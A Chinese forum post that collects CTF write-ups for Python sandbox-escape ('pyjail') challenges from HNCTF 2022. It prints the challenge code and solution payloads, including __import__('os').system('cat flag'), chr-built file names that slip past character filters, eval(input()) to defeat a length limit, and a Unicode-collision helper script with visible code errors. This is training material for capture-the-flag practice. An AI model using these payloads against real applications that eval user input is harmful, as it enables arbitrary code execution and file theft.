网络安全Jail 【Python沙箱逃逸问题合集】

写过一篇 发表于 2023-12-6 10:58:56

Jail 【Python沙箱逃逸问题合集】

借助NSS平台题目，以2022年HNCTF为例展开分析

背景：
由于目前很多赛事有时候会出现一些pyjail的题目，因此在这里总结一下以便以后遇见可以轻松应对。
注：由于Python3中的unicode特性，所以也会见到unicode碰撞的题目，因此利用下面脚本可以获取一些常用的碰撞unicode。
exp:
from unicodedata import normalize
from string import ascii_lowercase
from collections import defaultdict

lst = list(ascii_lowercase)
dic = defaultdict(list)
for char in lst:
for i in range(0x110000):
   if normalize("NFKC", chr(i)) == char:
         dic.append(chr(i))
   if len(dic) > 9:
         break
print(dic)calc_jail_beginner(JAIL)

连接靶机进入题目
nc node5.anna.nssctf.cn 28565                                                                                                 ─╯

_ ______    _                            _    _ _
| | |____| (_)                         | | (_) |
| |__ | |__ __ _ _ _ ___ __ ___ _ __    | | __ _ _| |
| '_ \|__| / _` | | '_ \| '_ \ / _ \ '__|_ | |/ _` | | |
| |_) | |___| (_| | | | | | | | |__/ | | |__| | (_| | | |
|_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_|
            __/ |
         |___/

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> 签到题，一把梭
open("flag").read()Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> open("flag").read()
Answer: flag=NSSCTF{25df994d-430f-498d-a4dd-ddb660ada60e}python2 input(JAIL)

连接靶机进入题目
nc node5.anna.nssctf.cn 28167                                                                                                 ─╯

         _ _    ___    ___ _____          _ _ _
         | | | | / _ \    |__ \|_ _|       | || | |
_ ___ _| |_| |__ | | | |_ __ ) | | |_ ___ __ | || | |_
| '_ \| | | | __| '_ \| | | | '_ \/ / | | | '_ \| '_ \| || | __|
| |_) | |_| | |_| | | | |_| | | | |/ /_ _| |_| | | | |_) | |__| | |_
| .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__|
| | __/ |                                     | |
|_| |___/                                     |_|

Welcome to the python jail
But this program will repeat your messages
> __import__("os").system("cat flag")Welcome to the python jail
But this program will repeat your messages
> __import__("os").system("cat flag")
flag=NSSCTF{2d86dce6-3763-438d-9e8e-554b267c1da6}
0calc_jail_beginner_level1(JAIL)

附件信息
#the function of filter will banned some string ',",i,b
#it seems banned some payload
#Can u escape it?Good luck!

def filter(s):
not_allowed = set('"\'`ib')
return any(c in not_allowed for c in s)

WELCOME = '''
_             _                         _    _ _ _             _ __
| |          (_)                      (_) (_) | | |          | /_ |
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| || |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || |
| |_) |__/ (_| | | | | | | | |__/ |    | | (_| | | | | |__/\ V /__/ || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    | |\__,_|_|_| |_|\___| \_/ \___|_||_|
         __/ |                      _/ |
         |___/                      |__/
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if filter(input_data):
print("Oh hacker!")
exit(0)
print('Answer: {}'.format(eval(input_data)))连接靶机进入题目
nc node5.anna.nssctf.cn 28239                                                                                                 ─╯

_             _                         _    _ _ _             _ __
| |          (_)                      (_) (_) | | |          | /_ |
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| || |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || |
| |_) |__/ (_| | | | | | | | |__/ |    | | (_| | | | | |__/\ V /__/ || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    | |\__,_|_|_| |_|\___| \_/ \___|_||_|
         __/ |                      _/ |
         |___/                      |__/

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> 过滤了部分字符，使用chr拼接flag
open(chr(102)+chr(108)+chr(97)+chr(103)).read()Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> open(chr(102)+chr(108)+chr(97)+chr(103)).read()
Answer: flag=NSSCTF{37ce5cec-7057-42d9-97fd-09b4ebc0e443}calc_jail_beginner_level2(JAIL)

附件信息
#the length is be limited less than 13
#it seems banned some payload
#Can u escape it?Good luck!

WELCOME = '''
_             _                         _    _ _ _             _ ___
| |          (_)                      (_) (_) | | |          | |__ \
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| |) |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / /
| |_) |__/ (_| | | | | | | | |__/ |    | | (_| | | | | |__/\ V /__/ |/ /_
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    | |\__,_|_|_| |_|\___| \_/ \___|_|____|
         __/ |                      _/ |
         |___/                      |__/
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if len(input_data)>13:
print("Oh hacker!")
exit(0)
print('Answer: {}'.format(eval(input_data)))连接靶机
nc node5.anna.nssctf.cn 28837                                                                                                 ─╯

_             _                         _    _ _ _             _ ___
| |          (_)                      (_) (_) | | |          | |__ \
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| |) |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / /
| |_) |__/ (_| | | | | | | | |__/ |    | | (_| | | | | |__/\ V /__/ |/ /_
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    | |\__,_|_|_| |_|\___| \_/ \___|_|____|
         __/ |                      _/ |
         |___/                      |__/

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> 限制了输入的字符长度不大于13
eval(input())这样就可以不限制输入并且执行了
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> eval(input())
open("flag").read()
Answer: flag=NSSCTF{48ba857a-34ec-4f31-ad69-726ef76d28c8}calc_jail_beginner_level2.5(JAIL)

附件信息
#the length is be limited less than 13
#it seems banned some payload
#banned some unintend sol
#Can u escape it?Good luck!

def filter(s):
BLACKLIST = ["exec","input","eval"]
for i in BLACKLIST:
   if i in s:
         print(f'{i!r} has been banned for security reasons')
         exit(0)

WELCOME = '''
_             _                         _    _ _ _             _ ___ _____
| |          (_)                      (_) (_) | |          | |__ \| ____|
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | _____ _____| |) | | |__
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ | / /|___ \
| |_) |__/ (_| | | | | | | | |__/ |    | | (_| | | | |__/\ V /__/ |/ /_ _ ___) |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/
         __/ |                      _/ |
         |___/                      |__/
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
filter(input_data)
if len(input_data)>13:
print("Oh hacker!")
exit(0)
print('Answer: {}'.format(eval(input_data)))2.5在level2基础上既有过滤又有长度限制。浅试了一下大概ban了eval、input、exec这几个字符，但是python中存在unicode的注入，所以直接调用level2的payload改下unicode就OK了，可使用背景处的碰撞脚本实现。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

页: [1]

ToB企服应用市场:ToB评测及商务社交产业平台's Archiver

Jail 【Python沙箱逃逸问题合集】